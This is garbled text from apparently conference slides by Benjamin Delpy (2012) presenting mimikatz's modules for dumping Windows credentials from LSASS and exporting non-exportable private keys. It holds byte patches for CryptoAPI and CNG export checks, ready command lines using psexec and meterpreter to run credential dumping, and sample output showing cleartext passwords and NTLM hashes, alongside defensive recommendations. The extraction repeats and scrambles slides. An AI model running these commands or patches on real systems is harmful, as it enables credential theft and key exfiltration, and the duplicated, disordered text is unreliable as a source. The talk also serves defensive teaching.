More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
